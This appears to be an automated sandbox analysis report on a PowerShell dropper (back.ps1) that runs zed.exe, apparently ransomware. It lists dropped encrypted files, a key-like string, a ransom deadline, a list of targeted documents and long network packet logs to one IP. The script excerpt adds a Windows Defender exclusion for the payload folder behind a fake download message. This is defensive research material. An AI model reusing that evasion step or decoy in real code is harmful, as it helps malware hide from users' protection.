                                                                                                                                                                                                                                            Preview:gAAAAABnTC65yw8tTfmLJsF8dLNrxD9h_6L8VrfVmULt4CpE1WiUEfgBiN-sUkyYZNJyIdMYgOWozGJNRxCKOtfxXwGAaI88KeXEoIF2QvBKrfz5Q3_SrUSB3-ieauvA9sJMdyzwsFb4r7yFfzb_auoPty6RhFUW7Wy6n_NYaeE3BQbVjG3NFF14SjeIAl4ev3hDbfUwC6CbJCMJynXEXLeNrQF218k0UmcnlvHhEmCnABUJaw0aucmFVQsdeUR1qOdUF16h0PLzoKgJNc2gp2IlzHivaA2ewW4W25Qpi3jHIt6aMFGXCRwWSdai-QndCMLj0qYt5k4ocregKJnMr-WyzYNRRw0k6q5szmTI18qVuO1_72Dob8ugKXnaxVnoo8QPSgkJwaD2NwDj0XXbqxhWb8EEU6WtrdRxmYMI8GwSBYNY5yRJbCqfVw1kssvEPTeHCvUF6jEKOc7bSszRyDYR1xMVbpsoQh5Jfxmwl3bAxAnDEInvUBa9tBJDahF7Nx9YLbd08k_BHeYtVKYVyTo7Bti4PTfbbq2zfSy6jfshnXLeAPDaOqXdmsMslgZ6n2BlnIRY9aFPpFBspzdRQTfQj_ttdc4C6hJOwTpVy5XedJ6BH5IaBBUE2K9NlXDugzq52bgR6Xw2AzUvWOuiJPw5JbWpq4DVrkFsBYY-E-nHpRGs2oLDqmz8lgj_u9Cj-78VEM3SicsET8v-V47mDnbM5XRsYVZVlIf4vlMy5kK143ufj7TkZ2HSMPw3D-b8Dq-8KtJYbH_t1dJS631aCYl8uFgRhF81m6EeBamUCfqAdV5jDcQbbbNwFOp7v5s1wUBvHtD0kJySkOMw4rA13LVSlG7iC4O86DMc6WuSdAd96s0_yQdgjrS-YK8LcuWiO_TwZEfLOJrd81_rSAJbNSYUCGiIvi0wnBMbGb6xLXBvXIpkKFWM1Rp6v8ZEKp1vaGAC1IDPmLDZFrHRGCf0dqMuh7LP-277u4PJk9N7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.977783779011875
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:QFWGIF5hgwvDpMVapLHrdidPq+9xXRtGkgvuD/rugoKQOQ76:/GK5CwvVMwdHrdijRTPCTG
                                                                                                                                                                                                                                            MD5:7C6D6CFF13C68FFDDF9D3B5A71331830
                                                                                                                                                                                                                                            SHA1:58E57394BAFE2F8B0B6C46EA420B5BA64F90C6B7
                                                                                                                                                                                                                                            SHA-256:A1B4AEFBA23C012F59952A4F16F99952EE8C4DFC1F8C7C932A6DFC3F9B561A79
                                                                                                                                                                                                                                            SHA-512:C0083AF7C58220092C75DF5913D7948CAFBC769A40760B551F21E15380FFD64D5E3C37BF7908322547424EE16A917437A3BFA8552AB82D7540862495F945B173
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC65i7TsxwopjtBMJhHFcioXL-WRWMhDTVKzrc6t6IavXXHvdeRF3n73AOBofZfo_aegbv8RgFxNV7ZfaipCCCegaISdo9q-CuX8oy_U5PgH7r_QKLK1fQ92flx-LI1-F45tSS07jwVFOdJ1gUXFF3kBeCEF0rBBX3DdrOOuQLE-h5qmAgJuQS_US3CTanFXg0guVbWM2AG2idHbj6Rll_36_yJPkfozmPaT2v9mlQ6fhHXO-X7meHHVsiO5ybXipOx0ytleZwjjC_CwxJlbIcfh3XyTTCwt9dp4NJMwttKsCesTeZItD3DJTiIcjQrZTfLbDTHrv3Zgd8INYmnoWQtjvSyUiRt86J3l0b5vrhvgqDz3OkILBwgIJ33s5Pa1Beqj9L54e9KgSNwOUja3Rz49dJAovxP8TkrPw3eK3QWfAAJ3JiOU8pSlVNOP_yCre9tTSZ4gz7Uj3Nr0dwoZ1a24kgfFofjxO8XqjVnQzu4Qmz0yHxH6wIwM6dNxoqq2uzwUzZBkcpN79TCFN4xW0hz5DuO5fyjpBmp2dluxs0vTbs5Jx-lpa-yenNZ47YjeZTllrpladpNa8CLy6zOrxrqOTx7sJckflkvSzbQJMZ8B296clMFqiPag8h6OPb56GIGTU09QIyLokOieSp7LdUaXQvFN3-TqoJhp1pqJytMgknsG_lfBlpSh-Sj0jn6k3JN177GWRLYyZCRfDl2yUgM9-S-XJRDAcfSBXcl4e0cdy0Kl0sWwn2ouWVKiLTwN9mZt1ldcDeuWu-3LlrMutTQPIz7ekicJhEqFFLLdK4yf3oMmTFmBpLwumyYeRSDbROmWx_hlhTdEZRIIcOJwc1CF3fXtakhTdhbuP0-zZyz28arFwM9_8S8jRQY3PsfopgHaLgJ0dtAUaZY9exuxLsIpMEOznsO3DTVz4yq_BjUQ5yY-fkc4v9KEiejymt7-9k5ttYfwsMPEFrkvCozQLrpu31e8hnMN
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.980293166934471
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:0jrfOyzroGFvNVXlm11XvsoENQAZhXoMh9jWIAaWQw+R/:0jrLNVItENQAZOpIAju
                                                                                                                                                                                                                                            MD5:6E102B2AE72C40F5F55202AAF2BDE103
                                                                                                                                                                                                                                            SHA1:8EF8437C7E37B5024F05B7F046DE5B672C3356D3
                                                                                                                                                                                                                                            SHA-256:F619FA7BC1DCCF3F2A2BED9A322723D4DF5FF2B72542EF69F9D147E2EEE75794
                                                                                                                                                                                                                                            SHA-512:A6909D98642E39C37713F803C21A5500B59ACC4BDD281B7D7B0D3D89EF1F1CD5B64F8A69CBDBBA3CCF80A93E08B59644F2C6B1A8B604746E6B1791CFEA76526A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC65SIwnp3wQHQ2usnse_n-myc9XwXE_DUOm1xcZcK0LLTh5fwQuZ6R3Wx5WQvnOZMlnRJhyD_Gzp9wDmQe5KgWF2_WgTewaSASA2GOp0GN6ymkh3wdOfqoQ6u2rfCj75MxhnA-ZeqMAHmnsfGhv96d0Gd1_O5MmyQ_6wjX0vjL7gKJagU3QP8ySh8qf_wYwG1YmGTusq3f3-I9ndNYQrPisNqE5wGLNd3nXTrfaIdInWmgI8T9P3oqlq_OoRSOFpNchVndtkXyIuaMDa_W84ZpGhZPLC0Iy9sSZXxCE4TfXJj3MTmRnWGs2q_jN8tkB641wL3kRRbaBJ10y2jPVw1w_qTyqKRRR_EykdCKsXJsu6Q73u9SfUJEJkATdNP7g33eDUVxBcWBy7dTdKxHrDJsM7boOZrQLrQRJnoygOpYZi3hQtupGZEwMTU9Ri_PAsRgMAhAEg6NsmllA7CUN9iO07olYTdUEFk9v0a0zfgIcYRVaWbw87VlOTOtIvcLiQOlekNWusKQ9iPFakyLEZsFdLBhPf3g1XFragBK-ywkneXLqlPf69Aes1Q5QLzjfGEntUX0lt-w7QY6pyWw92jQxEJVpF5DNSy_eWWP8a52PYYvzrPpdl1y9VHJ8ySkFx_S9z8aYgkO74--anA5MzyFCgYbcSKS7DnWuc7w8uwC-ndUMuq_00cuhl53HNLhhqkIJJoZo9ZwRNPbrcrWYJXWljFWwGqy4KAygOEHP9ELGiW1xd5QoeK9q0hbFli4kvACievVbsye12l41ImGZQno6c7y3hKr50iHMSdM2uzqwYdQhLXsPt3_-85jrzo2oYehqa8nBB_lHognPcRDbMYTEbrhFPBSZe3PJfm6olcGlSr3AzjT0ie2cKNJzYu01PQm5o-DlFgWRSHvFxPql-JERCYVjf2YH5DZkzrxBa0pMzCDxhsQ9EtLxWXbPQgBMtDxiZ6X5gUOuTHFTfDFR3yYnkbduU5b3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):42
                                                                                                                                                                                                                                            Entropy (8bit):4.2704265780462904
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:YBAVLAH1lrfqVWj4n:YDLqa4
                                                                                                                                                                                                                                            MD5:A5985F918FDFFA7170FBC81A6B4DF3A6
                                                                                                                                                                                                                                            SHA1:EBA56692D4639193D5273CB59BC93B814ED0F0D7
                                                                                                                                                                                                                                            SHA-256:75D927B2B69CBCB26D49604D76B4A56F68D9D14862D820BF6260B5F43B7F434A
                                                                                                                                                                                                                                            SHA-512:DA3CF1ECC48CDF62FCFE4F129A213EC2FB12579CA8F1AC269EAC750F65967EE3015800B3969300BF1A56F612C5F0B6226A5D2D1283E15C7E1A091F2B55EE9BB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:{"deadline": "2024-12-01T08:39:15.503701"}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3665
                                                                                                                                                                                                                                            Entropy (8bit):4.8906208379716105
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:oPpMtO1P8OavkVX8V0dJY+7TbWtOzQvkVjJLthRoVM8OixHVV/B+/mJhVh8Old8r:oy8ON8DnKvH3nwNc4y4NWcmHQfHW8sY
                                                                                                                                                                                                                                            MD5:B6C5506CDBFDBF6007A2A274AB967223
                                                                                                                                                                                                                                            SHA1:1866B8243EFAFEE67BFE0146C22D6FB583D110F0
                                                                                                                                                                                                                                            SHA-256:FD68BDAC518F544DC0A18F80715C86E8A94A6D18A02DD577494F603A804A7B2D
                                                                                                                                                                                                                                            SHA-512:B5DF5007B410B273410877A76CBFCE857798B265E7D6F937E08E6DF1427085F1E661FA393DAA422331886B5465363662E178377445817357253A24081590C5A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:C:\Users\user\..\user\Documents\BJZFPPWAPT.docx..C:\Users\user\..\user\Documents\DUUDTUBZFW.pdf..C:\Users\user\..\user\Documents\EIVQSAOTAQ.mp3..C:\Users\user\..\user\Documents\EIVQSAOTAQ.pdf..C:\Users\user\..\user\Documents\EOWRVPQCCS.jpg..C:\Users\user\..\user\Documents\EOWRVPQCCS.xlsx..C:\Users\user\..\user\Documents\GIGIYTFFYT.jpg..C:\Users\user\..\user\Documents\PALRGUCVEH.docx..C:\Users\user\..\user\Documents\PALRGUCVEH.xlsx..C:\Users\user\..\user\Documents\QCOILOQIKC.mp3..C:\Users\user\..\user\Documents\TQDFJHPUIU.png..C:\Users\user\..\user\Documents\ZGGKNSUKOP.png..C:\Users\user\..\user\Documents\BJZFPPWAPT\BJZFPPWAPT.docx..C:\Users\user\..\user\Documents\BJZFPPWAPT\DUUDTUBZFW.pdf..C:\Users\user\..\user\Documents\BJZFPPWAPT\EIVQSAOTAQ.mp3..C:\Users\user\..\user\Documents\BJZFPPWAPT\EOWRVPQCCS.jpg..C:\Users\user\..\user\Documents\BJZFPPWAPT\PALR
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):44
                                                                                                                                                                                                                                            Entropy (8bit):4.90796201621706
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:16XU838GMyNc0VdU9wE:WU8xMyT5E
                                                                                                                                                                                                                                            MD5:FD4F98B00C0F1E28C3BB99B08EF9740D
                                                                                                                                                                                                                                            SHA1:6B325FD6BB4FC61FEF0B224E5A436C94932B8BA8
                                                                                                                                                                                                                                            SHA-256:246F14EBAF82245A675575886C56CB575D55FAC9EFEA9E7CE18283078A495FE0
                                                                                                                                                                                                                                            SHA-512:43E01A57F8737600B6DED87E43100B077565B92F671A5FF102DE3917D97C57FC3FC2825C7BB556326FFEC79578734F67264216F32B16574540476BC105BD30AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Zr8-6PxrX7BYcXc0YctigprBjklK_I9axh08102OnSA=
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21
                                                                                                                                                                                                                                            Entropy (8bit):3.0589840894454268
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Bd/U:Q
                                                                                                                                                                                                                                            MD5:F1AFA59B04E1026EDE77E7E19F35A38F
                                                                                                                                                                                                                                            SHA1:D3241AD506C846F940E26A14FB52042EC3F95E0F
                                                                                                                                                                                                                                            SHA-256:4C7209946BB4436ABEB4F0B3FDFDEF077B12598DD0F7D22384B6CBADEC5331C7
                                                                                                                                                                                                                                            SHA-512:7D2764FF30670DEE95D635BB51E72168669873C7A18F2A98FCAB8B6B784A777AC231588362572CEC0E4509EB274DD4E3F4843B6B1B114A0006D454B221E0ACD5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Public IP: 00000000..
                                                                                                                                                                                                                                            File type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Entropy (8bit):5.105308545388046
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                              File name:back.ps1
                                                                                                                                                                                                                                              File size:4'417 bytes
                                                                                                                                                                                                                                              MD5:a5b77ea033190c4d914caec05d0d3442
                                                                                                                                                                                                                                              SHA1:a706128c4d0ebb2e1392ebc5bf72e6977802e86b
                                                                                                                                                                                                                                              SHA256:a8ef13f70701de206e5d946838605d299bb096caa6c149e70af25e938bed576a
                                                                                                                                                                                                                                              SHA512:7ee35745d43081c45b62e0713343b8238336f701dfb904224e58c1b7e9324f4462c543d4d4bba1ca0c1193acb4144f7e0406a9e19515eae903c64ff117f606cc
                                                                                                                                                                                                                                              SSDEEP:96:4J6BlVTuJP44AQ4Zy5cJEJa0OK5uTl0zzuy:4J6nMJP4s4QyJEJa0O1Tl0zzuy
                                                                                                                                                                                                                                              TLSH:AD91F034D501A13546F38B1BEAE0CA00EE8600AE6512294B754D64847FFADAD8799F7B
                                                                                                                                                                                                                                              File Content Preview:..$documentsPath = [Environment]::GetFolderPath("MyDocuments")..$folderPath = Join-Path -Path $documentsPath -ChildPath "gogjothegoat"..$processName = "zed.exe"..Add-MpPreference -ExclusionPath $folderPath | Out-Null..Write-Host "Fetching Document -- 1% -
                                                                                                                                                                                                                                              Icon Hash:3270d6baae77db44
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.559293985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.559345007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.559432030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.579451084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:27.579468012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.046355963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.046468973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.051808119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.051820993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.052064896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.062282085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.107331991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.595268011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.643702984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796662092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796674967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796777010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796792030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796823025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796823025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796834946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796844006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796884060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.796905994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.849489927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.849513054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.849581003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.849596024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.849643946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.901756048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.901777029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.901829004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.901838064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:29.901933908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.023544073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.023565054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.023621082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.023631096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.023685932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.054430008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.054450035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.054511070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.054518938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.054625034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.100265026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.100284100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.100399971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.100411892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.100536108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.208966017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.208988905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.209049940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.209059954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.209089041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.209120989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232021093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232043028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232110023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232116938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232141972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.232213020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.251185894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.251205921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.251241922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.251250029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.251323938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.274976015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.274995089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.275099039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.275109053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.275191069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.302843094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.302860975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.302948952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.302958012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.303124905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401118040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401143074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401211977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401225090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401241064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.401273012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415118933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415160894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415201902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415215969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415251970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.415251970 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.428364038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.428383112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.428457022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.428471088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.428519011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.442950010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.442970037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.443067074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.443083048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.443126917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451684952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451704979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451771975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451781034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451788902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.451857090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.459182978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.459199905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.459265947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.459275007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.459331989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467273951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467297077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467339039 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467348099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467431068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.467431068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501104116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501122952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501167059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501241922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501255035 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.501351118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602459908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602485895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602552891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602569103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602638006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.602638006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.609973907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.609992027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.610047102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.610055923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.610148907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:30.617858887 CET44349721142.132.252.48192.168.2.6
